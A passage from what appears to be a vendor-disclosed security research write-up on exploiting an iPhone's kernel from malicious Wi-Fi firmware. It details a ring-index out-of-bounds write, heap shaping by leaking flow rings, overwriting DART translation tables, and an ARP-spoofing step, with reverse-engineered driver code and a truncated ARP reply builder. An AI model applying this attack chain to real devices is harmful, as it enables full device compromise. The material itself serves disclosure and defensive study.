Putting the two together, we can write some code in our research framework to locate the kernel’s task, extract the internal translation tables, and encapsulate the data therein in a module representing an ARMv8 translation table.
Using our new module, we can now perform translations between the virtual addresses in the kernel’s VAS and physical ones. Furthermore, we can invert the translation table, producing a (one-to-many) mapping from physical to virtual addresses. In tandem with our DART module, this allows us to take each IO-Space address, convert it to a physical address, and then use our inverted translation table to convert it back to a virtual address in the kernel’s VAS.
Consequently, we can now iterate over the entire IO-Space exposed to the Wi-Fi chip, extracting the contents of every mapped region:

After producing a copy of the entire contents of IO-Space, we can now comb through it, searching for any “accidental” mappings that might be beneficial for a would-be attacker present on the Wi-Fi chip.
For starters, recall that the kernel protects itself against remote attackers by utilising KASLR. This mitigation introduces a randomised “slide” value, which is added to the kernel’s base loading address (both virtual and physical). Since many exploits rely on the ability to pre-calculate addresses within the kernel’s VAS, such a mitigation may slow down attackers, or hinder the reliability of exploits targeting the kernel.
However, as the same “slide” value is applied globally, it is often the case that a single “leaked” kernel VAS address results in a KASLR bypass (allowing attackers to deduce the slide’s value). Therefore, if any kernel virtual address is accidentally leaked in an IO-Space mapped page, the Wi-Fi chip may be able to similarly subvert KASLR.
Apart from the potential implications regarding KASLR, the presence of any kernel VAS pointer in IO-Space would be worrisome, as the pointer might be utilised by kernel code. Allowing a malicious Wi-Fi chip to corrupt its value may subsequently affect the kernel’s behaviour (perhaps even resulting in code execution).
To find out whether any kernel pointers are exposed through IO-Space, let’s scan through the extracted IO-Space pages, searching for 64-bit words corresponding to addresses within the kernel’s VAS. After going through every single page, we are greeted with a negative result; we can find no kernel VAS pointers in any IO-Space mapped page!
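A scan of this kind is straightforward to express in C. The sketch below checks every 8-byte-aligned little-endian word in a dumped page against a caller-supplied address range; the function name is hypothetical, and the bounds of the kernel's VAS are left as parameters since the exact range used for the scan is not stated here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 64-bit word from a byte buffer. */
static uint64_t read_le64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) {
        v = (v << 8) | p[i];
    }
    return v;
}

/*
 * Scan a dumped IO-Space page for 8-byte-aligned words that fall within
 * [va_min, va_max]. Stores up to `max_hits` matching offsets in `hits`
 * and returns the total number of matches.
 */
size_t find_kernel_pointers(const uint8_t *page, size_t len,
                            uint64_t va_min, uint64_t va_max,
                            size_t *hits, size_t max_hits) {
    assert(page != NULL);
    assert(hits != NULL || max_hits == 0);
    assert(va_min <= va_max);
    size_t count = 0;
    for (size_t off = 0; off + 8 <= len; off += 8) {
        uint64_t word = read_le64(page + off);
        if (word >= va_min && word <= va_max) {
            if (count < max_hits) {
                hits[count] = off;
            }
            count++;
        }
    }
    return count;
}
```

A wide range such as 0xFFFFFFF000000000 and above (an assumed bound, chosen because the kernel function addresses quoted earlier fall within it) trades a few false positives for coverage; any hits would then be inspected by hand.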
With a cursory investigation of IO-Space out of the way, we can now dig deeper, attempting to gain a better understanding of the IO-mapped contents. To this end, we’ll combine several approaches:
  1. Inspect each page’s contents to look for hints regarding its role
  2. Locate the kernel code responsible for interacting with the same IO-Space range
  3. Check the IO-Space address against posted addresses in the Wi-Fi firmware
  4. Use the Android driver as reference for any “strange” unidentified constructs

After performing the above steps, we are finally able to piece together a complete mapping of IO-Space (thus also concluding that no “accidental” mappings are present). It is important to note that since IO-Space is not subject to randomisation, the IO addresses are constant, and are not affected by the KASLR slide.
Searching For Vulnerabilities
Having explored the aspects relating to DART, IO-Space mappings, and low-level components, let’s proceed to inspect the more traditional attack surfaces exposed by the host.
Recall that the Wi-Fi chip and the host communicate with one another through a series of “rings”, mapped into IO-Space. Each ring facilitates the transfer of information in a single direction; either from the device to the host (D2H), or vice versa (H2D).
Among the messages transferred through message rings, “Control Messages” represent a rather abundant attack surface. These messages are used to instruct the firmware to perform complex state-changing operations, such as creating additional message rings, deleting them, and even transporting high-level requests (ioctls) to be processed by the firmware.
Due to their complexity, control messages rely on a bidirectional communication channel; the “Control Submit” ring (H2D) allows the host to submit the requests to the device, while the “Control Complete” ring (D2H) is used by the device to return the results back to the host.
After committing messages to the D2H rings, the Wi-Fi firmware signals the host by writing to a “MailBox” register and triggering an MSI interrupt. This interrupt is subsequently handled by the host, which inspects the MailBox register, and notifies the corresponding (D2H) rings that data may be available for processing.

Tracing through the above flow, we reach the handler function for processing incoming control messages within the host. To assist in reverse-engineering these messages, we’ll utilise Broadcom’s Android driver (bcmdhd), which contains the definitions for the control structures, as well as the message codes corresponding to each request.
The encapsulating handler simply reads the “message type” field, and proceeds to delegate the message’s processing to a dedicated handler -- one per message type. Going over each of the handlers, we stumble across a memory corruption bug triggerable by the firmware. Incidentally, the bug was present in a handler for a message type which isn’t available in the Android driver.
Moving on, let’s set our sights on slightly higher targets in the protocol stack. Recall that control rings are also used to carry high-level control requests from the host to the firmware, dubbed “ioctls”. Each ioctl allows the host to either set a firmware-specific configuration value, or to retrieve its current value. As this channel is quite versatile, much of the high-level interaction between the host and the firmware is enacted through this channel, including retrieving the current channel, setting network configurations, and more.
However, like any other signal originating from the device, it is important to remember that “ioctls” can be co-opted by malicious Wi-Fi firmware. After all, an attacker controlling the Wi-Fi firmware can simply hook the “ioctl” handling function, thereby allowing full control over the contents transmitted back to the host.
Reverse-engineering the high-level driver, AppleBCMWLANCore, we quickly identify the entry point responsible for issuing ioctl requests from the host to the Wi-Fi firmware. Cross referencing the function, we find nearly 500 call sites, several of which act as wrappers for common functionality, thus revealing even more originating call sites. After going over each of the aforementioned sites, we discover several memory corruptions in their corresponding handlers.
Lastly, there’s one more communication channel to consider -- Broadcom allows the in-band transmission of “event packets” from the Wi-Fi firmware to the host. These frames, denoted by a unique EtherType (0x886C), carry unsolicited events from the firmware, requiring special handling by the host. Tracing through the host’s RX path brings us to the entry point for handling such frames:

Once again, going over each handler in the above function (while using the Android driver to assist our understanding of the corresponding event codes and data structures), we discover two more vulnerabilities.
Better Vulnerabilities
Data Races?
While the vulnerabilities we just discovered allow us to trigger several forms of memory corruptions in the host (OOB writes, heap overflows), and even to leak constrained data from the host to the firmware, reliably exploiting any of them remains rather challenging.
For starters, the Wi-Fi chip has no visibility into the host’s memory (apart from the IO-Space mapped regions), and relatively little control over objects allocated within the kernel. Therefore, grooming the kernel’s memory in order to successfully launch a heap memory corruption attack would require significant effort. What’s more, this challenge is compounded by the presence of KASLR, preventing us from accurately locating the kernel’s data structures (barring any information disclosure).
Nonetheless, perhaps we can identify better primitives by digging deeper!
So far, we’ve only considered the contents of the data transferred between the host and the firmware. Effectively, we were thinking of the firmware and the host as two distinct entities, communicating with one another through an isolated communication channel. In fact, nothing can be further from the truth -- the two endpoints share a PCIe interface, allowing the firmware to perform DMA accesses at will to any IO-Space address.
One of the major risks when using a shared memory interface is the matter of timing. While the host and firmware normally synchronise their operations to ensure that no data races occur, attackers controlling the Wi-Fi firmware are bound by no such agreement. Using our control over the Wi-Fi chip, we can intentionally modify data structures within IO-Space as they are being accessed by the host. Doing so might allow us to introduce race conditions, such as TOCTTOUs, creating vulnerable conditions in otherwise safe code (under normal assumptions).
The first target for such modification are the control messages we inspected earlier on. Inspecting the control ring handler in the host, it appears that the messages are read directly from the IO-Space mapped buffer, raising the possibility for data races in their processing. Nonetheless, going over the relevant code paths, we find no security-relevant races.
What about the second control channel we reviewed -- event packets? Perhaps we could modify a packet’s contents while it is being processed, thereby affecting the kernel’s behaviour? Once again, the answer is negative; each transferred packet is first copied from its IO-Space mapped buffer to a kernel-resident mbuf before subsequently passing it on for processing, thus eliminating the possibility of firmware-induced races.
Message Rings, Revisited
So far, we’ve inspected the high-level functionality provided by message rings, namely, the control messages transported therein. However, we’ve neglected several aspects of their operation. One implementation detail of particular note is the method through which rings allow the endpoints to synchronise their accesses to the ring.
To allow concurrent accesses by both the ring’s consumer and its corresponding producer, each ring is assigned a pair of indices: a read index specifying the location up to which the consumer has read the messages, and a write index specifying the location at which the next message will be submitted by the producer. As their name implies, each ring forms a circular buffer -- upon arriving at the last ring index, the indices simply wrap around, returning back to the ring’s base.
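The index scheme described above can be sketched as a small circular-buffer model. This is only an illustration, not the host's or the firmware's actual implementation: the `Ring` type and its member names are hypothetical, and we assume one slot is always kept empty so that a full ring can be told apart from an empty one.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical model of a single ring's bookkeeping (names are illustrative).
struct Ring {
    uint32_t max_index;    // number of slots in the ring
    uint32_t read_index;   // next slot the consumer will read
    uint32_t write_index;  // next slot the producer will fill

    // Items committed by the producer but not yet consumed.
    uint32_t pending() const {
        assert(max_index > 0 && read_index < max_index && write_index < max_index);
        return (write_index + max_index - read_index) % max_index;
    }

    // Slots the producer may still fill; one slot stays empty so that
    // "full" and "empty" remain distinguishable (an assumption of this model).
    uint32_t free_slots() const {
        return max_index - 1 - pending();
    }

    // Producer side: commit one item, wrapping around at the end of the ring.
    bool produce() {
        if (free_slots() == 0) return false;
        write_index = (write_index + 1) % max_index;
        return true;
    }

    // Consumer side: retire one item, wrapping around at the end of the ring.
    bool consume() {
        if (pending() == 0) return false;
        read_index = (read_index + 1) % max_index;
        return true;
    }
};
```

Note that the model only stays consistent as long as both indices remain below `max_index`, which is exactly the invariant a producer and consumer normally rely on each other to uphold.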

Since both endpoints must be aware of the ring indices to successfully coordinate their access, a mechanism must exist through which the indices may be shared between the two. In Apple’s case, this is achieved by mapping all the indices into IO-Space mapped buffers.

While mapping the indices into IO-Space is a convenient way to share their values, it is not risk-free. For starters, if all the above indices are mapped into IO-Space, a malicious Wi-Fi chip may not only utilise DMA access to read them, but may also be able to modify them.
This form of access is excessive -- after all, the device need only update the read indices for H2D rings, and the write indices for D2H rings. The remaining indices should, at most, be read by the device. However, as DART’s implementation is proprietary, it is unknown whether it can facilitate read-only mappings. Consequently, all of the above indices are mapped into IO-Space as both readable and writable, thus allowing a malicious Wi-Fi chip to freely alter their values.
This IO-Space-based index sharing mechanism raises an important question; what if a Wi-Fi chip were to maliciously modify a ring’s indices while the ring is being processed by the host? Would doing so introduce a race condition? To find out, let’s take a look at the function through which the host submits messages into H2D rings:
1.  void* AppleBCMWLANPCIeSubmissionRing::workloopSubmitTx(uint32_t* p_read_index,
2.                                                         uint32_t* p_write_index) {
3.
4.      //Getting the write index from the IO-Space mapped buffer (!)
5.      uint32_t write_index = *(this->write_index_ptr);
6.
7.      //Iterating until there are no more events to process
8.      while (this->getRemainingEvents(p_read_index, p_write_index)) {
9.
10.         //Calculate the next insertion address based on the write index
11.         void* ring_addr = this->ring_base + this->item_size * write_index;
12.         uint32_t max_events = this->calculateRemainingWriteSpace();
13.
14.         //Writing the current events to the ring
15.         uint32_t num_written = this->submit_func(..., ring_addr, max_events);
16.         if (!num_written)
17.             break; //No more events to process
18.
19.         //Update the write index
20.         write_index += num_written;
21.         if (write_index >= this->max_index) {
22.             write_index = 0; //Wrap around
23.         }
24.         //Commit the new index to the IO-Space mapped buffer (!)
25.         *(this->write_index_ptr) = write_index;
26.     }
27.     ...
28. }
29.
30. class AppleBCMWLANPCIeSubmissionRing {
31.     ...
32.     uint32_t  max_index;          //The maximal ring index               (off 88)
33.     uint32_t  item_size;          //The size of each item                (off 92)
34.     uint32_t* read_index_ptr;     //IO-Space mapped read index pointer   (off 174)
35.     uint32_t* write_index_ptr;    //IO-Space mapped write index pointer  (off 184)
36.     void*     ring_base;          //IO-Space mapped ring base address    (off 248)
37. };
function 0xFFFFFFF006D36D04
Alright! Looking at the above function immediately raises some red flags…
The function appears to read values from IO-Space mapped buffers in several different locations, seemingly making no effort to coordinate the read values. This kind of pattern opens the door to the possibility of race conditions induced by the firmware.
Let’s focus on the “write index” utilised by the function. At first, the index is fetched by reading its value directly from the IO-Space mapped buffer (line 5). This same value is then used to derive the location to which the next ring item will be written (line 11). Crucially, however, the value is not used in any shape or form by the surrounding verifications utilised by the function to decide whether the current ring indices are valid (lines 8, 12).
Therefore, the verification methods must re-fetch the indices’ values, introducing a possible discrepancy between the value used during verification, and the one used to place the next item.
To exploit the above issue, an attacker controlling the Wi-Fi chip can DMA into the ring indices in order to introduce one value for the ring address calculation (line 5), while quickly switching the index to a different, valid value, for the remaining validations (lines 8, 12). If the above race is executed successfully, the following H2D item will be submitted by the host at an arbitrary attacker-controlled offset from the ring’s base, triggering an out-of-bounds write!
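The double-fetch pattern at the heart of this race can be modelled deterministically. In the sketch below, `ScriptedIndex` is a hypothetical stand-in for a device-writable index: every read returns the next value from a script, imitating firmware that rewrites the index between two host reads. Neither function is taken from the driver; they merely contrast validating a re-fetched value with validating the very snapshot that is later used.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <utility>
#include <vector>

// Hypothetical device-writable index: each read yields the next scripted
// value, and the last value repeats once the script is exhausted.
class ScriptedIndex {
public:
    explicit ScriptedIndex(std::vector<uint32_t> values)
        : values_(std::move(values)) {}

    uint32_t read() {
        assert(!values_.empty());
        uint32_t v = values_[pos_];
        if (pos_ + 1 < values_.size()) ++pos_;
        return v;
    }

private:
    std::vector<uint32_t> values_;
    std::size_t pos_ = 0;
};

constexpr uint32_t kInvalidSlot = UINT32_MAX;

// Double fetch: the slot comes from the first read, but the bounds check
// inspects a second, independent read of the same shared location.
uint32_t pick_slot_double_fetch(ScriptedIndex& shared, uint32_t max_index) {
    uint32_t slot = shared.read();     // value later used for the write
    uint32_t checked = shared.read();  // value seen by the validation
    return (checked < max_index) ? slot : kInvalidSlot;
}

// Single fetch: one snapshot is both validated and used.
uint32_t pick_slot_single_fetch(ScriptedIndex& shared, uint32_t max_index) {
    uint32_t slot = shared.read();
    return (slot < max_index) ? slot : kInvalidSlot;
}
```

With a script of `{5000, 3}` and a 256-slot ring, the double-fetch variant hands back slot 5000 because the check only ever saw the value 3, whereas the single-fetch variant rejects it.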
Removing The Race Condition
While the above primitive is no doubt useful, it has one inherent downside -- performing a data race from an external vantage point may be a difficult feat, especially considering the platform we’re executing on (an ARM Cortex R) is significantly slower than the targeted one (a full-blown application processor).
Perhaps by gaining a better understanding of the primitive, we can deal with these limitations. To this end, let’s take a closer look at the validation performed by the submission function:
1.  uint32_t AppleBCMWLANPCIeSubmissionRing::calculateRemainingWriteSpace() {
2.
3.      uint32_t read_index, write_index;
4.      this->getIndices(&read_index, &write_index);
5.
6.      //Did the ring wrap around?
7.      if (read_index > write_index)
8.          return read_index - (write_index + 1);
9.      else
10.         return this->max_index - write_index + (read_index ? 0 : -1);
11. }
12.
13. void AppleBCMWLANPCIeSubmissionRing::getIndices(uint32_t* rindex,
14.                                                 uint32_t* windex) {
15.     uint32_t read_index = *(this->read_index_ptr);
16.     uint32_t write_index = *(this->write_index_ptr);
17.     if (read_index >= 0x10000 || write_index >= 0x10000)
18.         panic(...);
19.     *rindex = read_index;
20.     *windex = write_index;
21. }
Ah-ha! Looking at the code above, we can identify yet another fault.
When fetching the ring indices, the getIndices function attempts to validate their values to ensure that they do not exceed the allowed ranges. This is undoubtedly a good idea, as it prevents corrupted values from being utilised (which may result in memory corruption).
However, instead of comparing the indices against the current ring’s capacity, they are compared against a fixed maximal value: 0x10000. While this value is certainly an upper bound on the rings’ capacities, it is far from a tight bound (in fact, most rings only hold several hundred items at most).
Therefore, observing the code above we reach two immediate conclusions. First, if we were to attempt a race condition whereby the ring index is modified to a value larger than the fixed bound (0x10000), we run the risk of triggering a kernel panic should the race attempt fail (line 18). More importantly, however, modifying the write index to any value below the fixed bound (but still above the actual ring’s bounds), will allow us to pass the validations above, resulting in an out-of-bounds write with no race-condition required.
Using the above primitive, we can target any H2D ring, causing the next element to be reliably inserted at an out-of-bounds address within the kernel’s VAS! While the affected range is limited to the ring’s item size multiplied by the aforementioned fixed bound, as we’ll see later on, that’s more than enough.
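To make the arithmetic concrete, here is a minimal sketch contrasting the fixed-bound check with a capacity-based one, and computing how far past the ring's base the next item can land. The helper names are hypothetical, and the ring parameters used in the usage note (256 slots, 48-byte items) are illustrative values rather than measurements from the device.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint32_t kFixedBound = 0x10000;  // the constant used by getIndices

// Mirrors the check described above: any index below the fixed bound passes.
constexpr bool passes_fixed_check(uint32_t index) {
    return index < kFixedBound;
}

// The check one would expect instead: compare against the ring's capacity.
constexpr bool passes_capacity_check(uint32_t index, uint32_t max_index) {
    return index < max_index;
}

// Byte offset from the ring's base at which the next item would be written.
inline uint64_t write_offset(uint32_t item_size, uint32_t write_index) {
    assert(passes_fixed_check(write_index));  // larger values would hit the panic
    return static_cast<uint64_t>(item_size) * write_index;
}

// Largest byte offset reachable without tripping the fixed-bound check.
inline uint64_t max_reachable_offset(uint32_t item_size) {
    return write_offset(item_size, kFixedBound - 1);
}
```

For a hypothetical 256-slot ring of 48-byte items, an index of 0x8000 fails the capacity check but sails through the fixed one, placing the next item 0x180000 bytes past the ring's base.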
Triggering the Primitive
Before pressing on, it’s important that we prove that the scenario above is indeed feasible. After all, many components within the kernel might utilise the modified ring indices, which, in turn, may enforce their own validations.
To do so, we’ll perform a short experiment using our research platform. First, we’ll select an H2D ring, and fetch its corresponding object within the kernel. Using the aforementioned object, we can then locate the ring’s base address, allowing us to inspect its contents. Now, we’ll modify the ring indices by utilising the firmware’s DMA engine, while concurrently monitoring the kernel virtual address at the targeted offset for modification. If the primitive is triggered successfully, we should expect an item to be inserted at the target offset from the ring’s base address.
However, running the above experiment results in a resounding failure! Every attempt to trigger the out-of-bounds write results in a kernel panic, thereby crashing the device. Inspecting the panic logs reveals the source of this crash:

It appears that when executing our attack, the firmware attempts to perform a DMA read operation from an address beyond its IO-Space mapped ranges! Taking a moment to reflect on this, the source of the error is immediately apparent: since both the firmware and the host share the ring indices through IO-Space, modifying the aforementioned values affects not only the host, but also the firmware’s implementation of the MSGBUF protocol.
Namely, the firmware attempts to read the ring’s contents using the corrupted indices, resulting in an out-of-bounds access to IO-Space, triggering the above panic.
As we have control over the firmware, we could simply try to intercept the corresponding code paths in its MSGBUF implementation, thus preventing it from issuing the malformed DMA request. Unfortunately, this approach is easier said than done - the firmware’s implementation of MSGBUF is woven into many code-paths in both the ROM and RAM; attempting to patch-out each part results in either breakage of a different component, or in undesired side-effects.
Instead of addressing the sources of the DMA transfers, we’ll go straight to the target -- the engine itself. Recall that each DMA engine on the firmware is accessible through an instance of a single structure (dma_info). Changing the DMA engine’s backplane register pointers within the dma_info structure would mean that while the calling code-paths are able to continue issuing malformed DMA requests, the requests themselves are never actually received by the DMA engine, thus preventing us from triggering a fault.

Indeed, incorporating the above patch into our vulnerability trigger, we can now freely modify the ring indices without inducing a crash. Furthermore, inspecting the corresponding kernel virtual address at the targeted index, we can see that our overwrite is finally successful!
Devising An Exploit Plan
Having concluded that the primitive is usable, we can now proceed to the next stage -- devising an exploit plan. Namely, we must decide on a data structure to target using the exploit primitive, which may allow us to either modify the kernel’s behaviour, or otherwise gain a useful primitive bringing us closer to that goal.
So which data structure should we target? As we do not have any visibility into the kernel’s address space, reliably locating structures within the kernel presents quite a challenge. What’s more, our primitive only allows limited control over the written content (namely, the data written by the host is an H2D ring item). On top of that, each OOB element can only be written at offsets which are multiples of the ring’s item size, thus introducing alignment constraints.
The above limitations make reliable exploitation rather difficult. Alas, if only there were a data structure whose internal composition were relatively flexible, and to which a single modification would grant us complete control over the host…
...But of course, we’ve already come across the perfect target -- DART’s translation tables!
Recall that DART’s translation tables govern the mapping between IO-Space and the host’s physical address space. If we were able to use our primitive in order to modify the tables, we might be able to introduce new mappings into IO-Space, pointing at arbitrary physical ranges within the host’s PAS. Mapping arbitrary physical memory into IO-Space is a nearly ideal primitive, as it would allow the chip to modify any data structure used by the kernel, leading to trivial code execution.
In order to successfully carry out such an attack, we must first figure out whether DART’s translation tables indeed constitute valid targets for the vulnerability primitive. Namely, we must figure out whether they reside within the primitive’s scope of influence.
However, scanning through the memory ranges within the primitive’s scope, we quickly come to the realisation that the placement of objects following the message rings is highly variable. Indeed, each device reboot yields an entirely different layout, thus preventing us from relying on any particular object being placed at any given offset from a message ring.
Perhaps we’re out of luck…?
Shaping IO-Space
...Instead of relying on the lucky placement of nearby objects, let’s take matters into our own hands.
In order to place a DART translation table within the primitive’s scope, we’d need to either move a translation table into the primitive’s scope, or to move one of the message rings, thus shifting the primitive’s scope across different regions of the kernel’s memory.
The former approach seems infeasible; DART’s translation tables are only allocated when the IO-Space mappings are first populated (namely, when the Wi-Fi chip is first initialised). Once the mapping is complete, all of DART’s translation tables remain in their fixed positions within the kernel’s VAS.
But what about moving the rings? While control rings are immovable, a second set of rings exists -- “flow rings”. Flow rings are H2D rings used to facilitate the transfer of outgoing (TX) traffic. They do not carry the traffic itself, but rather notify the device of the transmitted frame’s metadata (including the IO-Space address at which its actual content is stored).
Unlike control rings, flow rings are far more “flexible”. Individual flows are dynamically added and removed as the need arises, by sending a corresponding control message from the host to the device. Each flow is identified by its endpoints (source and destination MAC), their encompassed protocol (i.e., EtherType), and their “priority”.
Perhaps we can use this dynamic nature of flow rings to our advantage. For example, if we were to delete a flow ring, it might subsequently get re-allocated at a different location in the kernel’s memory, thus shifting the scope of our OOB primitive to a possibly more “interesting” patch of objects.
Normally, deleting a flow ring is a two way process; the host sends a deletion request, which is subsequently met by a corresponding message from the device, signalling a successful deletion. However, inspecting the host’s implementation of the above messages, it appears we can just as well skip the first half of the exchange, and send an unsolicited deletion response from the device:
uint32_t AppleBCMWLANBusPCIeInterface::completeFlowRingDeleteResponseMsg(
              uint64_t unused, struct tx_flowring_delete_response_t* msg) {

    //Is the ring ID within bounds?
    if (msg->flow_ring_id < this->min_flow ||
        msg->flow_ring_id >= this->max_flow) {
        ...
    }
    //Does a flow ring exist at the given index?
    else if (this->flow_rings[msg->flow_ring_id]) {
        this->deleteFlowCallback(msg->status, msg->flow_ring_id);
        ...
        return 0;
    }
    else {
        ...
        return 0xE00002BC;
    }
}
function 0xFFFFFFF006D2FD44
Doing so causes an interesting side-effect to occur: instead of completely deleting the ring, the host decrements a single reference count on the ring object, which is insufficient to bring down the total count to zero (the missing release was meant to be performed by the code responsible for sending the deletion request in the first place).
Consequently, the flow ring is left mapped into IO-Space, but is unusable by the host. As such, newly allocated flow rings cannot inhabit the same IO-Space range (as it remains occupied by the unusable ring), and must instead be carved from higher IO-Space addresses.
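The reference-count imbalance can be illustrated with a toy model. Everything here is hypothetical: the `FlowRing` type, the function names, and in particular the assumption that a live ring holds exactly two references, one released by each half of the deletion exchange. The real driver's bookkeeping is more involved; the sketch only shows why skipping the request half leaves the ring mapped.

```cpp
#include <cassert>

// Hypothetical flow ring state; field names are illustrative.
struct FlowRing {
    int  refcount;  // assumed to start at 2 in this model
    bool usable;    // whether the host still treats the ring as active
    bool mapped;    // whether the ring still occupies its IO-Space range
};

FlowRing create_flow_ring() {
    return FlowRing{2, true, true};
}

// Dropping the last reference is what releases the IO-Space range.
void release(FlowRing& ring) {
    assert(ring.refcount > 0);
    if (--ring.refcount == 0) ring.mapped = false;
}

// Host-initiated half: sending the deletion request drops one reference.
void send_delete_request(FlowRing& ring) {
    release(ring);
}

// Device-initiated half: the response retires the ring and drops one reference.
void complete_delete_response(FlowRing& ring) {
    ring.usable = false;
    release(ring);
}
```

Running both halves brings the count to zero and unmaps the ring, while an unsolicited response alone leaves a ring that is unusable yet still occupies its IO-Space range.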
This primitive has several interesting side-effects.
For starters, it allows us to re-allocate flow rings, thus moving around their base addresses within the kernel’s VAS, recasting the net over potentially interesting objects within the kernel.
More importantly, however, this primitive allows us to force the allocation of a brand new DART L2 translation table. Since each L2 translation table can only map a fixed range into IO-Space, by continuously leaking flow rings we are able to exhaust the available space in the L2 table, thereby forcing DART to allocate a new table from which the next IO-Space addresses are carved.
Lastly, as luck would have it, since both the rings themselves and DART’s translation tables are carved using the same allocator (IOMalloc), and have similar sizes, they are both carved from the same “zone” of memory. Therefore, by continuously leaking IO-Space addresses and creating new flow rings until a new DART L2 translation table is formed, we can guarantee that the new table will be placed in close proximity to the following flow ring, thereby placing the L2 translation table within our primitive’s scope!

Putting it all together, we can finally reach a reliable placement of DART translation tables in close proximity to a flow ring, thereby allowing us to overwrite entries in the translation tables with flow ring items.
Flow Ring Items vs. DART Descriptors
To understand whether flow ring items make good candidates to overwrite DART descriptors, let’s take a moment to inspect their structure. As these items are present in the same form in the Android driver, we are spared the need to reverse-engineer them:
So how does the above structure relate to a DART descriptor?
As the above structure has a 64-bit aligned size, and ring items are always placed in increments of the same size, we can deduce that each quadword in the above structure will reside in a 64-bit aligned address. Similarly, DART descriptors are 64 bits wide, and are placed in 64-bit aligned addresses. Therefore, each aligned quadword in the above structure serves as a potential candidate for replacing a DART descriptor.
However, going over the above quadwords, it is quickly apparent that no fully-controlled word exists within the structure. Indeed, the first and last word are composed of mostly constant values, whereas the third and fourth contain IO-Space addresses (whose forms are incompatible with DART descriptors). Nonetheless, taking a closer look, it appears that the second word is at least somewhat malleable. Its lower six bytes are governed by the destination MAC address to which the frame is being transmitted, while the two upper bytes contain the beginning of our source MAC.
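The composition of that second quadword can be sketched as follows, assuming a little-endian host in which the destination MAC occupies the six lowest-addressed bytes and is immediately followed by the source MAC. The `second_quadword` helper is hypothetical and exists purely to show which bytes end up where.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

using Mac = std::array<uint8_t, 6>;

// Builds the 64-bit little-endian value formed by a 6-byte destination MAC
// followed by the first two bytes of the source MAC.
uint64_t second_quadword(const Mac& dst, const Mac& src) {
    uint64_t q = 0;
    for (int i = 0; i < 6; ++i)
        q |= static_cast<uint64_t>(dst[i]) << (8 * i);  // low six bytes
    q |= static_cast<uint64_t>(src[0]) << 48;           // upper two bytes
    q |= static_cast<uint64_t>(src[1]) << 56;
    return q;
}
```

For instance, a destination of 11:22:33:44:55:66 and a source beginning with AA:BB yields the value 0xBBAA665544332211, with the first destination byte landing in the least-significant position.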
Assuming we could cause the host to send frames to a MAC address of our choosing, that would grant us control over the lower six bytes. However, the remaining two bytes are populated using our device’s MAC address, a much harder target for modification...
Spoofing The Source MAC?
To understand whether we can indeed modify the device’s MAC address, let’s take a closer look at the mechanisms through which the MAC address may be programmable on the Wi-Fi chip.
Like many production devices, Broadcom’s Wi-Fi chips allow the storage of chip-specific configuration using one of two mechanisms; either by using a block of Serial Programmable ROM (SPROM) or by utilising a set of One Time Programmable (OTP) fuses. The Wi-Fi chip present on the iPhone 7 uses the latter mechanism.
As for the host, it stores the Wi-Fi chip’s MAC address in the “device tree” (among many other device-specific properties). The “device tree” is a simple hierarchical representation of hardware components utilised by the platform (much like its Linux counterpart, bearing the same name), allowing consumers within the kernel to easily access (and populate) its nodes.
During the Wi-Fi chip’s initialisation, the AppleBCMWLANCore driver retrieves the contents of the chip’s OTP fuses (using the PCIe BARs), and proceeds to parse them according to the PCMCIA Card Information Structure (CIS) format. Reverse-engineering the parsing functions in the kernel, it is quickly apparent that one tag in particular bears significance with regards to our pursuits.
If a “Function Extension” tag is encountered in the CIS data embedded in the OTP, the kernel will extract the MAC address encapsulated within it, and insert it into the “local-mac-address” node in the device tree, representing the Wi-Fi MAC address!

Extracting the stored OTP contents from the kernel, we can see that no such element is present in the OTP contents to begin with, thus allowing us to insert our own tag without fear of causing a collision:
Wi-Fi Chip OTP
Therefore, to change the MAC address, all we’d need to do is fuse the corresponding bits into the OTP, thus inserting the new CIS tag. However, this is easier said than done. For starters, writing to the OTP is a risky operation, and may result in permanent damage to the chip if done incorrectly. Moreover, as its name implies, writing to the OTP is a one-time operation, leaving no room for error. Perhaps we could avoid changing the MAC after all?
After discussing the above situation, my colleague Ian Beer suggested an alternative!
Why not, instead, check if the high-order bits in the DART descriptor are actually being used for the translation process? To test this suggestion, we’ll use the research platform to insert a valid L2 descriptor into DART, with one small caveat -- we’ll change the two upper bytes in the 64-bit descriptor to “corrupted” values. After inserting the mapping, we can simply insert a DMA hook into the firmware, performing a DMA access to the aforementioned address.

Running the experiment above we are greeted with a positive result! Indeed, the upper bytes of the DART descriptor are ignored by the translation process, thus sparing us the need to modify the MAC.
Spoofing The Destination MAC
Having confirmed that modifying the source MAC is no longer a barrier, all that remains is to cause the host to send a frame to a crafted MAC address, thus allowing us to control the six significant bytes within our 64-bit word.
Naturally, one way to solicit a response from the host is to transmit an ICMP Echo Request (ping) to it, subsequently triggering a corresponding ICMP Echo Reply to be sent back. While this approach can easily trigger the transmission of frames from the host, it only allows frames to be transmitted to known destinations, but does not offer control over the destination MAC.
To trigger communications to our target MAC, we’ll first launch an ARP Spoofing attack: we send a crafted ping from an arbitrary (unused) IP address, causing the host to send an “ARP Request” querying the MAC address of the crafted IP. We then reply with an ARP response encoding our own MAC address, thus associating the IP address with a crafted MAC value.
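The ARP response used in this step has a simple, fixed layout, sketched below for Ethernet and IPv4. The `build_arp_reply` helper and the addresses in the usage note are hypothetical; the field values (hardware type 1, protocol type 0x0800, opcode 2, EtherType 0x0806) are the standard ones for an ARP reply.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

using Mac  = std::array<uint8_t, 6>;
using Ipv4 = std::array<uint8_t, 4>;

// Builds an Ethernet frame carrying an ARP reply that claims
// "sender_ip is at sender_mac", addressed to the target host.
std::vector<uint8_t> build_arp_reply(const Mac& sender_mac, const Ipv4& sender_ip,
                                     const Mac& target_mac, const Ipv4& target_ip) {
    std::vector<uint8_t> frame;
    frame.reserve(42);
    auto append = [&frame](const uint8_t* data, std::size_t len) {
        frame.insert(frame.end(), data, data + len);
    };

    // Ethernet header: destination, source, EtherType 0x0806 (ARP).
    append(target_mac.data(), target_mac.size());
    append(sender_mac.data(), sender_mac.size());
    const uint8_t ethertype[] = {0x08, 0x06};
    append(ethertype, sizeof(ethertype));

    // ARP header: Ethernet (1), IPv4 (0x0800), lengths 6 and 4, opcode 2 (reply).
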